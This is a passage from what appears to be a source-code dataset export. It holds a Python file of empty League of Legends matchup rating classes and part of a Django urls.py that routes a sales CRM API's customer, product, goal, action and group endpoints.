| 2,334
| 102
| 83
| 22.882353
| 0.789741
| 0.058269
| 0
| 0.627451
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.215686
| false
| 0
| 0.039216
| 0
| 0.72549
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 11
|
ae4b4936ec99be0d71f2f8b4188d464db4ca1978
| 6,821
|
py
|
Python
|
loldib/getratings/models/NA/na_malzahar/na_malzahar_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_malzahar/na_malzahar_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_malzahar/na_malzahar_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Malzahar_Sup_Aatrox(Ratings):
pass
class NA_Malzahar_Sup_Ahri(Ratings):
pass
class NA_Malzahar_Sup_Akali(Ratings):
pass
class NA_Malzahar_Sup_Alistar(Ratings):
pass
class NA_Malzahar_Sup_Amumu(Ratings):
pass
class NA_Malzahar_Sup_Anivia(Ratings):
pass
class NA_Malzahar_Sup_Annie(Ratings):
pass
class NA_Malzahar_Sup_Ashe(Ratings):
pass
class NA_Malzahar_Sup_AurelionSol(Ratings):
pass
class NA_Malzahar_Sup_Azir(Ratings):
pass
class NA_Malzahar_Sup_Bard(Ratings):
pass
class NA_Malzahar_Sup_Blitzcrank(Ratings):
pass
class NA_Malzahar_Sup_Brand(Ratings):
pass
class NA_Malzahar_Sup_Braum(Ratings):
pass
class NA_Malzahar_Sup_Caitlyn(Ratings):
pass
class NA_Malzahar_Sup_Camille(Ratings):
pass
class NA_Malzahar_Sup_Cassiopeia(Ratings):
pass
class NA_Malzahar_Sup_Chogath(Ratings):
pass
class NA_Malzahar_Sup_Corki(Ratings):
pass
class NA_Malzahar_Sup_Darius(Ratings):
pass
class NA_Malzahar_Sup_Diana(Ratings):
pass
class NA_Malzahar_Sup_Draven(Ratings):
pass
class NA_Malzahar_Sup_DrMundo(Ratings):
pass
class NA_Malzahar_Sup_Ekko(Ratings):
pass
class NA_Malzahar_Sup_Elise(Ratings):
pass
class NA_Malzahar_Sup_Evelynn(Ratings):
pass
class NA_Malzahar_Sup_Ezreal(Ratings):
pass
class NA_Malzahar_Sup_Fiddlesticks(Ratings):
pass
class NA_Malzahar_Sup_Fiora(Ratings):
pass
class NA_Malzahar_Sup_Fizz(Ratings):
pass
class NA_Malzahar_Sup_Galio(Ratings):
pass
class NA_Malzahar_Sup_Gangplank(Ratings):
pass
class NA_Malzahar_Sup_Garen(Ratings):
pass
class NA_Malzahar_Sup_Gnar(Ratings):
pass
class NA_Malzahar_Sup_Gragas(Ratings):
pass
class NA_Malzahar_Sup_Graves(Ratings):
pass
class NA_Malzahar_Sup_Hecarim(Ratings):
pass
class NA_Malzahar_Sup_Heimerdinger(Ratings):
pass
class NA_Malzahar_Sup_Illaoi(Ratings):
pass
class NA_Malzahar_Sup_Irelia(Ratings):
pass
class NA_Malzahar_Sup_Ivern(Ratings):
pass
class NA_Malzahar_Sup_Janna(Ratings):
pass
class NA_Malzahar_Sup_JarvanIV(Ratings):
pass
class NA_Malzahar_Sup_Jax(Ratings):
pass
class NA_Malzahar_Sup_Jayce(Ratings):
pass
class NA_Malzahar_Sup_Jhin(Ratings):
pass
class NA_Malzahar_Sup_Jinx(Ratings):
pass
class NA_Malzahar_Sup_Kalista(Ratings):
pass
class NA_Malzahar_Sup_Karma(Ratings):
pass
class NA_Malzahar_Sup_Karthus(Ratings):
pass
class NA_Malzahar_Sup_Kassadin(Ratings):
pass
class NA_Malzahar_Sup_Katarina(Ratings):
pass
class NA_Malzahar_Sup_Kayle(Ratings):
pass
class NA_Malzahar_Sup_Kayn(Ratings):
pass
class NA_Malzahar_Sup_Kennen(Ratings):
pass
class NA_Malzahar_Sup_Khazix(Ratings):
pass
class NA_Malzahar_Sup_Kindred(Ratings):
pass
class NA_Malzahar_Sup_Kled(Ratings):
pass
class NA_Malzahar_Sup_KogMaw(Ratings):
pass
class NA_Malzahar_Sup_Leblanc(Ratings):
pass
class NA_Malzahar_Sup_LeeSin(Ratings):
pass
class NA_Malzahar_Sup_Leona(Ratings):
pass
class NA_Malzahar_Sup_Lissandra(Ratings):
pass
class NA_Malzahar_Sup_Lucian(Ratings):
pass
class NA_Malzahar_Sup_Lulu(Ratings):
pass
class NA_Malzahar_Sup_Lux(Ratings):
pass
class NA_Malzahar_Sup_Malphite(Ratings):
pass
class NA_Malzahar_Sup_Malzahar(Ratings):
pass
class NA_Malzahar_Sup_Maokai(Ratings):
pass
class NA_Malzahar_Sup_MasterYi(Ratings):
pass
class NA_Malzahar_Sup_MissFortune(Ratings):
pass
class NA_Malzahar_Sup_MonkeyKing(Ratings):
pass
class NA_Malzahar_Sup_Mordekaiser(Ratings):
pass
class NA_Malzahar_Sup_Morgana(Ratings):
pass
class NA_Malzahar_Sup_Nami(Ratings):
pass
class NA_Malzahar_Sup_Nasus(Ratings):
pass
class NA_Malzahar_Sup_Nautilus(Ratings):
pass
class NA_Malzahar_Sup_Nidalee(Ratings):
pass
class NA_Malzahar_Sup_Nocturne(Ratings):
pass
class NA_Malzahar_Sup_Nunu(Ratings):
pass
class NA_Malzahar_Sup_Olaf(Ratings):
pass
class NA_Malzahar_Sup_Orianna(Ratings):
pass
class NA_Malzahar_Sup_Ornn(Ratings):
pass
class NA_Malzahar_Sup_Pantheon(Ratings):
pass
class NA_Malzahar_Sup_Poppy(Ratings):
pass
class NA_Malzahar_Sup_Quinn(Ratings):
pass
class NA_Malzahar_Sup_Rakan(Ratings):
pass
class NA_Malzahar_Sup_Rammus(Ratings):
pass
class NA_Malzahar_Sup_RekSai(Ratings):
pass
class NA_Malzahar_Sup_Renekton(Ratings):
pass
class NA_Malzahar_Sup_Rengar(Ratings):
pass
class NA_Malzahar_Sup_Riven(Ratings):
pass
class NA_Malzahar_Sup_Rumble(Ratings):
pass
class NA_Malzahar_Sup_Ryze(Ratings):
pass
class NA_Malzahar_Sup_Sejuani(Ratings):
pass
class NA_Malzahar_Sup_Shaco(Ratings):
pass
class NA_Malzahar_Sup_Shen(Ratings):
pass
class NA_Malzahar_Sup_Shyvana(Ratings):
pass
class NA_Malzahar_Sup_Singed(Ratings):
pass
class NA_Malzahar_Sup_Sion(Ratings):
pass
class NA_Malzahar_Sup_Sivir(Ratings):
pass
class NA_Malzahar_Sup_Skarner(Ratings):
pass
class NA_Malzahar_Sup_Sona(Ratings):
pass
class NA_Malzahar_Sup_Soraka(Ratings):
pass
class NA_Malzahar_Sup_Swain(Ratings):
pass
class NA_Malzahar_Sup_Syndra(Ratings):
pass
class NA_Malzahar_Sup_TahmKench(Ratings):
pass
class NA_Malzahar_Sup_Taliyah(Ratings):
pass
class NA_Malzahar_Sup_Talon(Ratings):
pass
class NA_Malzahar_Sup_Taric(Ratings):
pass
class NA_Malzahar_Sup_Teemo(Ratings):
pass
class NA_Malzahar_Sup_Thresh(Ratings):
pass
class NA_Malzahar_Sup_Tristana(Ratings):
pass
class NA_Malzahar_Sup_Trundle(Ratings):
pass
class NA_Malzahar_Sup_Tryndamere(Ratings):
pass
class NA_Malzahar_Sup_TwistedFate(Ratings):
pass
class NA_Malzahar_Sup_Twitch(Ratings):
pass
class NA_Malzahar_Sup_Udyr(Ratings):
pass
class NA_Malzahar_Sup_Urgot(Ratings):
pass
class NA_Malzahar_Sup_Varus(Ratings):
pass
class NA_Malzahar_Sup_Vayne(Ratings):
pass
class NA_Malzahar_Sup_Veigar(Ratings):
pass
class NA_Malzahar_Sup_Velkoz(Ratings):
pass
class NA_Malzahar_Sup_Vi(Ratings):
pass
class NA_Malzahar_Sup_Viktor(Ratings):
pass
class NA_Malzahar_Sup_Vladimir(Ratings):
pass
class NA_Malzahar_Sup_Volibear(Ratings):
pass
class NA_Malzahar_Sup_Warwick(Ratings):
pass
class NA_Malzahar_Sup_Xayah(Ratings):
pass
class NA_Malzahar_Sup_Xerath(Ratings):
pass
class NA_Malzahar_Sup_XinZhao(Ratings):
pass
class NA_Malzahar_Sup_Yasuo(Ratings):
pass
class NA_Malzahar_Sup_Yorick(Ratings):
pass
class NA_Malzahar_Sup_Zac(Ratings):
pass
class NA_Malzahar_Sup_Zed(Ratings):
pass
class NA_Malzahar_Sup_Ziggs(Ratings):
pass
class NA_Malzahar_Sup_Zilean(Ratings):
pass
class NA_Malzahar_Sup_Zyra(Ratings):
pass
| 16.357314
| 46
| 0.776133
| 972
| 6,821
| 5.020576
| 0.151235
| 0.197951
| 0.42418
| 0.509016
| 0.814139
| 0.814139
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162879
| 6,821
| 416
| 47
| 16.396635
| 0.854641
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
ae94138b77eae87c6d2d4d80934603bce77497f2
| 42,873
|
py
|
Python
|
api/urls.py
|
manisharmagarg/qymatix
|
0dc240970359429ae5105db79f9aebf1a99ba6fd
|
[
"Apache-2.0"
] | null | null | null |
api/urls.py
|
manisharmagarg/qymatix
|
0dc240970359429ae5105db79f9aebf1a99ba6fd
|
[
"Apache-2.0"
] | null | null | null |
api/urls.py
|
manisharmagarg/qymatix
|
0dc240970359429ae5105db79f9aebf1a99ba6fd
|
[
"Apache-2.0"
] | null | null | null |
# from django.conf.urls import patterns, url
from django.urls import path, re_path
from django.contrib.auth.decorators import login_required
# from tokenapi.decorators import token_required
from tokenapi.decorators import token_required
from api import actionsapi
from api import contactsapi
from api import customersapi
from api import dataanalysisapi
from api import insightsapi
from api import salesapi
from api import usersapi
from api import groupsapi
from api import mapsapi
from api import productsapi
from api import goalsapi
from api import industryapi
# from api import currenciesapi
# from api import xingapi
# from webapp import views
urlpatterns = [
# re_path(r'^doc$', customersapi.apidoc_index, name=u"apidoc"),
re_path(r'^doc/$', login_required(customersapi.apidoc_index, login_url='/webapp/v1.0/login'), name=u"apidoc"),
re_path(r'^doc/index/$', login_required(customersapi.apidoc_index, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
re_path(r'^doc/search/$', login_required(customersapi.apidoc_search, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
re_path(r'^doc/genindex/$', login_required(customersapi.apidoc_genindex, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
re_path(r'^doc/introduction/$', login_required(customersapi.apidoc_introduction, login_url='/webapp/v1.0/login'), name=u"apidoc"),
re_path(r'^doc/customer_functions/$', login_required(customersapi.apidoc_customer_functions, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
re_path(r'^doc/users_api/$', login_required(usersapi.apidoc_users_api, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
re_path(r'^doc/actions_api/$', login_required(actionsapi.apidoc_actions_api, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
re_path(r'^doc/goals_api/$', login_required(goalsapi.apidoc_goals_api, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
re_path(r'^doc/products_api/$', login_required(productsapi.apidoc_products_api, login_url='/webapp/v1.0/login/'), name=u"apidoc"),
# re_path(r'^(?P<workspace>\d+)/upload$', login_required(views.upload), name=u"upload"),
# re_path(r'^(?P<workspace>\d+)/(?P<user>\d+):(?P<token>[-\w\d-]+)/upload$', token_required(views.upload), name=u"upload"),
# Critters related urls
# Insights
re_path(r'^(?P<workspace>\d+)/getinsights$', login_required(insightsapi.getInsights, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getinsights/(?P<account>.*)$', login_required(insightsapi.getInsights, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/get_insights$', login_required(insightsapi.get_insights, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/get_insights/(?P<account>.*)$', login_required(insightsapi.get_insights, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getCustomerRisk$', login_required(insightsapi.getCustomerRisk, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getCustomerRisk/(?P<account>[-\w ]+)$', login_required(insightsapi.getCustomerRisk, login_url='/webapp/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getCrossSellingProducts$', login_required(insightsapi.getCrossSellingProducts, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getCrossSellingProducts/(?P<account>.*)$', login_required(insightsapi.getCrossSellingProducts, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getCrossSellingProductTypes$', login_required(insightsapi.getCrossSellingProductTypes, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getCrossSellingProductTypes/(?P<account>.*)$', login_required(insightsapi.getCrossSellingProductTypes, login_url='/webapp/v1.0/login/'), name=u"apidata"),
# Customers
re_path(r'^(?P<workspace>\d+)/getdata$', login_required(customersapi.getCustomersData, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getcustomerslist$', login_required(customersapi.getCustomersList, login_url='/webapp/v1.0/login/'), name=u"apigetcustomerslist"),
re_path(r'^(?P<workspace>\d+)/getcustomers$', login_required(customersapi.getCustomers, login_url='/webapp/v1.0/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/getcustomers/(?P<account>.*)$', login_required(customersapi.getCustomers, login_url='/webapp/v1.0/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/get_customers$', login_required(customersapi.get_customers, login_url='/webapp/v1.0/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/get_customers/(?P<account>.*)$', login_required(customersapi.get_customers, login_url='/webapp/v1.0/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/insertCustomer/(?P<data>.*)$', login_required(customersapi.insertCustomer), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/modifyCustomer/(?P<data>.*)$', login_required(customersapi.modifyCustomer), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/deleteCustomer/(?P<data>.*)$', login_required(customersapi.deleteCustomer), name=u"saveCustData"),
# Contacts
re_path(r'^(?P<workspace>\d+)/getdata$', login_required(contactsapi.getContactsData, login_url='/webapp/v1.0/login/'), name=u"apidata"),
re_path(r'^(?P<workspace>\d+)/getcontactslist$', login_required(contactsapi.getContactsList, login_url='/webapp/v1.0/login/'), name=u"apigetcustomerslist"),
re_path(r'^(?P<workspace>\d+)/getcontactslist/(?P<account>.*)$', login_required(contactsapi.getContactsList, login_url='/webapp/v1.0/login/'), name=u"apigetcustomerslist"),
re_path(r'^(?P<workspace>\d+)/getcontacts$', login_required(contactsapi.getContacts, login_url='/webapp/v1.0/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/getcontactsByCustomer$', login_required(contactsapi.getContactsByCustomer, login_url='/webapp/v1.0/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/getcontactsByCustomer/(?P<account>.*)$', login_required(contactsapi.getContactsByCustomer, login_url='/webapp/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/getcontacts/(?P<account>.*)$', login_required(contactsapi.getContacts, login_url='/webapp/login/'), name=u"apigetcustomers"),
re_path(r'^(?P<workspace>\d+)/insertContact/(?P<data>.*)$', login_required(contactsapi.insertContact), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/modifyContact/(?P<data>.*)$', login_required(contactsapi.modifyContact), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/deleteContact/(?P<data>.*)$', login_required(contactsapi.deleteContact), name=u"saveCustData"),
# # Sales
re_path(r'^(?P<workspace>\d+)/insertSalesRecord/(?P<data>.*)$', login_required(salesapi.insertSalesRecord), name=u"saveCustData"),
# # Products
re_path(r'^(?P<workspace>\d+)/insertProduct/(?P<data>.*)$', login_required(productsapi.insertProduct), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/insertProductType/(?P<data>.*)$', login_required(productsapi.insertProductType), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/insertProductLine/(?P<data>.*)$', login_required(productsapi.insertProductLine), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/insertProductClass/(?P<data>.*)$', login_required(productsapi.insertProductClass), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/deleteProduct/(?P<product>.*)$', login_required(productsapi.deleteProduct), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/deleteProductType/(?P<product>.*)$', login_required(productsapi.deleteProductType), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getProducts$', login_required(productsapi.getProducts), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getProductsBy$', login_required(productsapi.getProductsBy), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getProductsBy/(?P<groupby>.*)$', login_required(productsapi.getProductsBy), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getProductInsights$', login_required(productsapi.getProductInsights), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getProductInsights/(?P<params>.*)$', login_required(productsapi.getProductInsights), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/get_product_insights$', login_required(productsapi.get_product_insights), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/get_product_insights/(?P<params>.*)$', login_required(productsapi.get_product_insights), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getProductTypeInsights$', login_required(productsapi.getProductTypeInsights), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getProductTypeInsights/(?P<params>.*)$', login_required(productsapi.getProductTypeInsights), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/topproducts$', login_required(productsapi.topProducts), name=u"setconfiginfo"),
re_path(r'^(?P<workspace>\d+)/topproducts/(?P<params>.*)$', login_required(productsapi.topProducts), name=u"setconfiginfo"),
# KAMs
re_path(r'^(?P<workspace>\d+)/createKam/(?P<data>.*)$', login_required(actionsapi.createKam), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/modifyKam/(?P<data>.*)$', login_required(actionsapi.modifyKam), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/mergeKams/(?P<data>.*)$', login_required(actionsapi.mergeKams), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/deleteKam/(?P<kamid>.*)$', login_required(actionsapi.deleteKam), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getKam/(?P<data>.*)$', login_required(actionsapi.getKam), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getKam$', login_required(actionsapi.getKam), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/linkKamToAction/(?P<lk>.*)$', login_required(actionsapi.linkKamToAction), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/unlinkKamFromAction/(?P<lk>.*)$', login_required(actionsapi.unlinkKamFromAction), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/linkKamToPlan/(?P<lk>.*)$', login_required(actionsapi.linkKamToPlan), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/unlinkKamFromPlan/(?P<lk>.*)$', login_required(actionsapi.unlinkKamFromPlan), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/linkKamToCustomer/(?P<lk>.*)$', login_required(actionsapi.linkKamToCustomer), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/unlinkKamFromCustomer/(?P<lk>.*)$', login_required(actionsapi.unlinkKamFromCustomer), name=u"apigetplans"),
# Xing
# re_path(r'^(?P<workspace>\d+)/getXingJobs$', login_required(xingapi.getXingJobs), name=u"saveCustData"),
# re_path(r'^(?P<workspace>\d+)/getXingUserProfile$', login_required(xingapi.getXingUserProfile), name=u"saveCustData"),
# Goals
re_path(r'^(?P<workspace>\d+)/createGoal/(?P<data>.*)$', login_required(goalsapi.createGoal), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/modifyGoal/(?P<data>.*)$', login_required(goalsapi.modifyGoal), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getGoals/(?P<data>.*)$', login_required(goalsapi.getGoals), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getGoals$', login_required(goalsapi.getGoals), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getGoalsByYear/(?P<data>.*)$', login_required(goalsapi.getGoalsByYear), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getGoalsByYear$', login_required(goalsapi.getGoalsByYear), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getGoalsPerQuarter/(?P<data>.*)$', login_required(goalsapi.getGoalsPerQuarter), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getGoalsPerQuarter$', login_required(goalsapi.getGoalsPerQuarter), name=u"saveCustData"),
#url(ur'^getGoals$', login_required(goalsapi.getGoals), name=u"saveCustData"),
# Performance
re_path(r'^(?P<workspace>\d+)/getTotalPerformance$', login_required(goalsapi.getTotalPerformance), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getPerformance$', login_required(goalsapi.getPerformance), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getPerformanceKpi$', login_required(goalsapi.getPerformanceKpi), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/getPerformanceCRM$', login_required(goalsapi.getPerformanceCRM), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/get_performance_crm$', login_required(goalsapi.get_performance_crm), name=u"saveCustData"),
# re_path(r'^(?P<workspace>\d+)/get_performance_crm$', login_required(goalsapi.get_performance_crm), name=u"saveCustData"),
# re_path(r'^(?P<workspace>\d+)/Performance_search$', login_required(goalsapi.get_performance_crm), name=u"saveCustData"),
# Data analysis
#url(ur'^(?P<workspace>\d+)/analyzeData$', login_required(dataanalysisapi.analyzeData), name=u"saveCustData"),
# Actions
re_path(r'^(?P<workspace>\d+)/getactions$', login_required(actionsapi.getTasks, login_url='/webapp/login/'), name=u"apigetactions"),
re_path(r'^(?P<workspace>\d+)/getactions/(?P<account>.*)$', login_required(actionsapi.getTasks, login_url='/webapp/login/'), name=u"apigetactions"),
re_path(r'^(?P<workspace>\d+)/getActions$', login_required(actionsapi.getActions, login_url='/webapp/login/'), name=u"apigetactions"),
re_path(r'^(?P<workspace>\d+)/getActions/(?P<account>.*)$', login_required(actionsapi.getActions, login_url='/webapp/login/'), name=u"apigetactions"),
re_path(r'^(?P<workspace>\d+)/createAction/(?P<task>.*)$', login_required(actionsapi.createAction), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/setaction/(?P<task>.*)$', login_required(actionsapi.setTask), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/deleteAction/(?P<task>.*)$', login_required(actionsapi.dropTask, login_url='/webapp/login/'), name=u"apidroptask"),
re_path(r'^(?P<workspace>\d+)/modifyAction/(?P<action>.*)$', login_required(actionsapi.modifyAction), name=u"apicreateplan"),
# Plans
re_path(r'^(?P<workspace>\d+)/getplans$', login_required(actionsapi.getPlans), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/getplans/(?P<account>.*)$', login_required(actionsapi.getPlans), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/get_plans$', login_required(actionsapi.get_plans), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/get_plans/(?P<account>.*)$', login_required(actionsapi.get_plans), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/setplan/(?P<plan>.*)$', login_required(actionsapi.setPlan), name=u"apicreateplan"),
re_path(r'^(?P<workspace>\d+)/createPlan/(?P<plan>.*)$', login_required(actionsapi.setPlan), name=u"apicreateplan"),
re_path(r'^(?P<workspace>\d+)/modifyPlan/(?P<plan>.*)$', login_required(actionsapi.modifyPlan), name=u"apicreateplan"),
re_path(r'^(?P<workspace>\d+)/deletePlan/(?P<planid>\d+)$', login_required(actionsapi.dropPlan), name=u"apidropplan"),
# Plans and Actions
re_path(r'^(?P<workspace>\d+)/plansToActions$', login_required(actionsapi.plansToActions), name=u"apigetplansperaciton"),
re_path(r'^(?P<workspace>\d+)/getPlansPerAction$', login_required(actionsapi.getPlansGroupedByAction), name=u"apigetplansperaciton"),
re_path(r'^(?P<workspace>\d+)/getPlansPerAction/(?P<account>.*)$', login_required(actionsapi.getPlansGroupedByAction), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/getActionsPerPlan$', login_required(actionsapi.getActionsGroupedByPlan), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/getActionsPerPlan/(?P<account>.*)$', login_required(actionsapi.getActionsGroupedByPlan), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/linkPlanToAction/(?P<lk>.*)$', login_required(actionsapi.linkPlanToAction), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/unlinkPlanFromAction/(?P<lk>.*)$', login_required(actionsapi.unlinkPlanFromAction), name=u"apigetplans"),
# Users
re_path(r'^(?P<workspace>\d+)/getuserprofile$', login_required(usersapi.getUserProfile, login_url='/webapp/login/'), name=u"getuserprofile"),
re_path(r'^(?P<workspace>\d+)/getusertoken$', usersapi.getUserToken, name=u"getusertoken"),
re_path(r'^(?P<workspace>\d+)/setContactInfo/(?P<info>.*)$', login_required(usersapi.setUserContactInfo, login_url='/webapp/login/'), name=u"setcontactinfo"),
re_path(r'^(?P<workspace>\d+)/setactivityinfo/(?P<info>\w+)$', login_required(usersapi.setUserContactInfo, login_url='/webapp/login/'), name=u"setactivityinfo"),
re_path(r'^(?P<workspace>\d+)/setconfiginfo/(?P<language>\w+)$', login_required(usersapi.setUserConfigInfo, login_url='/webapp/login/'), name=u"setconfiginfo"),
# Groups
re_path(r'^(?P<workspace>\d+)/getGroups$', login_required(groupsapi.getGroups), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/getGroups/(?P<user_id>[-\w\ ]+)$', login_required(groupsapi.getGroups), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/createGroup/(?P<group>.*)$', login_required(groupsapi.createGroup), name=u"apicreateplan"),
re_path(r'^(?P<workspace>\d+)/modifyGroup/(?P<group>.*)$', login_required(groupsapi.modifyGroup), name=u"apicreateplan"),
re_path(r'^(?P<workspace>\d+)/deleteGroup/(?P<group_id>\d+)$', login_required(groupsapi.deleteGroup), name=u"apidropplan"),
# Groups and Users
re_path(r'^(?P<workspace>\d+)/getUsersPerGroup$', login_required(groupsapi.getUsersPerGroup), name=u"apigetplansperaciton"),
re_path(r'^(?P<workspace>\d+)/getUsersPerGroup/(?P<user_name>[-\w\ ]+)$', login_required(groupsapi.getUsersPerGroup), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/getGroupsPerUser$', login_required(groupsapi.getGroupsPerUser), name=u"apigetplansperaciton"),
re_path(r'^(?P<workspace>\d+)/getGroupsPerUser/(?P<user_name>[-\w\ ]+)$', login_required(groupsapi.getGroupsPerUser), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/addUserToGroup/(?P<lk>.*)$', login_required(groupsapi.addUserToGroup), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/removeUserFromGroup/(?P<lk>.*)$', login_required(groupsapi.removeUserFromGroup), name=u"apigetplans"),
# Maps
re_path(r'^(?P<workspace>\d+)/maps/getCustomers$', login_required(mapsapi.getCustomers), name=u"setconfiginfo"),
re_path(r'^(?P<workspace>\d+)/maps/getAllocation/(?P<details>.*)', login_required(mapsapi.getAllocation), name=u"setconfiginfo"),
# --- Token access ---
# Customers
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getdata$', token_required(customersapi.getCustomersData), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getdata/(?P<account>.*)$', token_required(customersapi.getCustomersData), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcustomers$', token_required(customersapi.getCustomers), name=u"apigetcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcustomers/(?P<account>.*)$', token_required(customersapi.getCustomers), name=u"apigetcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_customers$', token_required(customersapi.get_customers), name=u"apigetcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_customers/(?P<account>.*)$', token_required(customersapi.get_customers), name=u"apigetcustomers"),
